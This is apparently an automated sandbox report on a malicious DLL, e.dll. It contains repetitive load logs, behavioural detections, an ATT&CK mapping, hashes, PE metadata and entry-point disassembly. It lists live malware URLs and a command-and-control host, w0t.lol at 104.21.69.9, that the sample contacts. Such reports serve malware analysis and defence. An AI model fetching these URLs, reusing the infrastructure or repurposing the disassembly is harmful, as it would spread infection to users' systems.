Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) | graph_3-1929
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_06622A81 FindFirstFileW
Source: rundll32.exe, 00000003.00000002.22960045348.0000000003190000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960045348.0000000003152000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960045348.0000000003121000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03000005 VirtualAlloc,LoadLibraryA,LdrGetProcedureAddress,VirtualProtect
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00C5C340 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03000391 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_27AC1120 mov ebx, dword ptr fs:[00000030h]

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 104.21.69.9 443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00C51090 cpuid
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: 111 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: 1 Virtualization/Sandbox Evasion, 111 Process Injection, 1 Obfuscated Files or Information, 1 Rundll32, 1 Software Packing, 1 DLL Side-Loading
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: 11 Security Software Discovery, 1 Virtualization/Sandbox Evasion, 1 File and Directory Discovery, 13 System Information Discovery, Internet Connection Discovery, Wi-Fi Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: 1 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: 21 Encrypted Channel, 4 Ingress Tool Transfer, 3 Non-Application Layer Protocol, 14 Application Layer Protocol, Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
Source | Detection | Scanner | Label
e.dll | 100% | Avira | HEUR/AGEN.1300770
e.dll | 100% | Joe Sandbox ML |
No Antivirus matches
URL | Detection | Scanner | Label
https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_c | 100% | Avira URL Cloud | malware
https://w0t.lol/ | 100% | Avira URL Cloud | malware
https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe
http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe
https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cFx1mTVmw7UgAUUyYrKRm3RdsqVNvpv6_kKFgqugw7GxorO8WhL4PsC4qoVKtjEe0DOKO8ZDw1Tjmp1kilcdzr5ins6cIF1bcVHlXvd0LhB36FiVt_ML5BynNwrbTMXHBlrYMYDHKv7fr-4V207YlIg6tWfJiMRdzu_qeSooE4jIQIx6aML1s49f-Ri0B1CS37y5JuxrX5yqAG8oDK4QDEBXT7TWGpGoNsuTFyKiEDbJQD0BBibjsRhVHiSSidzARVzTSro8qK1SpnxWQFVotTjKG7CepcMDibvLwH_Jr5CkuCYLKtK52-cvQybIZ4Fhw0wjCJODhJJbW1bSQqThISFsFSjkb8WhpxT9Aqfic0XA | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
w0t.lol | 104.21.69.9 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cFx1mTVmw7UgAUUyYrKRm3RdsqVNvpv6_kKFgqugw7GxorO8WhL4PsC4qoVKtjEe0DOKO8ZDw1Tjmp1kilcdzr5ins6cIF1bcVHlXvd0LhB36FiVt_ML5BynNwrbTMXHBlrYMYDHKv7fr-4V207YlIg6tWfJiMRdzu_qeSooE4jIQIx6aML1s49f-Ri0B1CS37y5JuxrX5yqAG8oDK4QDEBXT7TWGpGoNsuTFyKiEDbJQD0BBibjsRhVHiSSidzARVzTSro8qK1SpnxWQFVotTjKG7CepcMDibvLwH_Jr5CkuCYLKtK52-cvQybIZ4Fhw0wjCJODhJJbW1bSQqThISFsFSjkb8WhpxT9Aqfic0XA | | true | Avira URL Cloud: malware | unknown
http://www.quovadis.bm0 | rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://w0t.lol/ | rundll32.exe, 00000003.00000002.22960045348.000000000317F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ocsp.quovadisoffshore.com0 | rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_c | rundll32.exe, 00000003.00000002.22960045348.0000000003121000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.69.9 | w0t.lol | United States | 13335 | CLOUDFLARENETUS | true
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1519390
    Start date and time:2024-09-26 13:09:29 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 13m 11s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
    Run name:Suspected Instruction Hammering
    Number of analysed new started processes analysed:5
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:e.dll
    Detection:MAL
    Classification:mal80.bank.evad.winDLL@6/0@1/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 86%
    • Number of executed functions: 71
    • Number of non-executed functions: 42
    Cookbook Comments:
    • Found application associated with file extension: .dll
    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtEnumerateKey calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: e.dll
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdf | malicious | HTMLPhisher | 104.18.38.76
 | http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE | malicious | WinSearchAbuse | 104.16.79.73
 | http://ti6.htinenate.com | malicious | Unknown | 172.67.162.17
 | https://coreleete.de/pt/Odrivex/ | malicious | HTMLPhisher | 104.17.25.14
 | Ref_336210627.exe | malicious | Snake Keylogger | 188.114.96.3
 | g3V051umJf.html | malicious | Unknown | 188.114.96.3
 | https://centuriontm.bizarreonly.net | malicious | EvilProxy, HTMLPhisher | 104.26.13.205
 | https://storage.googleapis.com/inbound-mail-attachments-prod/0cbecb77-b573-4b3b-8c97-8b461d262d51?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1758806989&Signature=teNXGJRcW9uuEoVVvD0bLb%2BTGBorxpSu89OlgLR0AZpo8aoMl3JFsBDoXmLnj9QMk%2BAPu8iGsKTPrT4i0XSxxzRmtCLdsbDi23%2FFHfN4OpU3mOnUXtbZ81e7h5Ax%2FIygnxvogL7iGUXrqQUBZEnVkPmXcpAMmBTX7%2Bj4kVf57xBQo4WA9yGdv5Df4b9nDGZMXEYZVxWjPtOk4%2FXapMoV5bYJLgpB%2BR%2F1LUE0IwT1d3wuv1q6TONtaWwducy4mc1%2FJvGqxFuxuW9Y6Ojq%2B7a%2FqCW4DaFdd42O6ViY63C8G7dPbTe9LtxhwHcAk9xg3n5kXh2Z75tDAkK2Ak5mKneP6g%3D%3D | malicious | Unknown | 1.1.1.1
 | nBank_Report.pif.exe | malicious | Snake Keylogger | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | Payment copy.vbs | malicious | FormBook, GuLoader | 104.21.69.9
 | Z09QznvZSr.exe | malicious | Unknown | 104.21.69.9
 | PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbe | malicious | GuLoader, Lokibot | 104.21.69.9
 | PersonalizedOffer.exe | malicious | UltraVNC | 104.21.69.9
 | PersonalizedOffer.exe | malicious | UltraVNC | 104.21.69.9
 | 38sab1rT0H.exe | malicious | Latrodectus | 104.21.69.9
 | file.exe | malicious | LummaC, Vidar | 104.21.69.9
 | update.js | malicious | NetSupport RAT | 104.21.69.9
 | file.exe | malicious | LummaC, Vidar | 104.21.69.9
    No created / dropped files found
    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
    Entropy (8bit):7.857208389757357
    TrID:
    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
    • Generic Win/DOS Executable (2004/3) 0.20%
    • DOS Executable Generic (2002/1) 0.20%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:e.dll
    File size:2'228'224 bytes
    MD5:972d3e17b96745be89b80ec5d8f4f9d3
    SHA1:e97c6461bbdcd91566f4cb75b456e399b7fe06c2
    SHA256:b116511e3960ab5fa53ad6a3243240be11235ebdc323705827713cf12a9aeeda
    SHA512:060b6a99fae4af1d869cd23b84ab2b18d69eeba5ff60ac1355e605e5ecfe049b41fb52dc5989cdac90572133389673cc48fe366494bcb01de278bf93a247982a
    SSDEEP:49152:kwNgYx8UccgdkvUADkwkxSnTyCbJux8OwyvW:kwBVcNgUyZbnTytPTW
    TLSH:90A502BDB064C781D64B397F7E0A332DB53A17805187AD26E51778AE70236EC11B42BB
    File Content Preview:MZ......................@............................................q...q...q..0/...q..u*...q...,...q.......q..u*...q....V..q.......q..M....q..Rich.q..............PE..L...q3.f...........!......... !.....P.............@..........................."........
    Icon Hash:0f372331d982ca5a
    Entrypoint:0x401450
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
    DLL Characteristics:TERMINAL_SERVER_AWARE
    Time Stamp:0x66F43371 [Wed Sep 25 15:59:45 2024 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:0
    File Version Major:5
    File Version Minor:0
    Subsystem Version Major:5
    Subsystem Version Minor:0
    Import Hash:abe607481ac2953967a12ac99e7e578f
    Instruction
    inc edx
    inc edx
    inc eax
    add dword ptr [00433320h], esp
    inc eax
    dec eax
    inc edx
    dec eax
    jmp 00007F5254DC67DFh
    dec eax
    mov eax, esi
    push eax
    pop dword ptr [00433310h]
    xor edx, 0Ah
    inc edx
    mov eax, edx
    xor dword ptr [00433318h], ebx
    mov eax, edi
    push eax
    pop dword ptr [00433314h]
    mov dword ptr [0043331Ch], ebp
    lea eax, dword ptr [00401210h]
    call eax
    jmp 00007F5254DC6783h
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    mov dword ptr [ebp+00h], eax
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    push ebp
    mov ebp, esp
    push eax
    mov eax, 00000001h
    mov dword ptr [ebp-04h], 00000000h
    add esp, 04h
    pop ebp
    ret
    nop
    nop
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf694 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x20f000 | 0x6d28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x216000 | 0x9a4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf030 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xf000 | 0x30 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xc910 | 0xd000 | d8c6c2ce2710e51965ec969f1e605308 | False | 0.09927133413461539 | data | 1.5511921998856308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.crt1 | 0xe000 | 0x4e | 0x1000 | 029ebcb0413d7a466159aef461509fff | False | 0.025634765625 | data | 0.19194904064040105 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
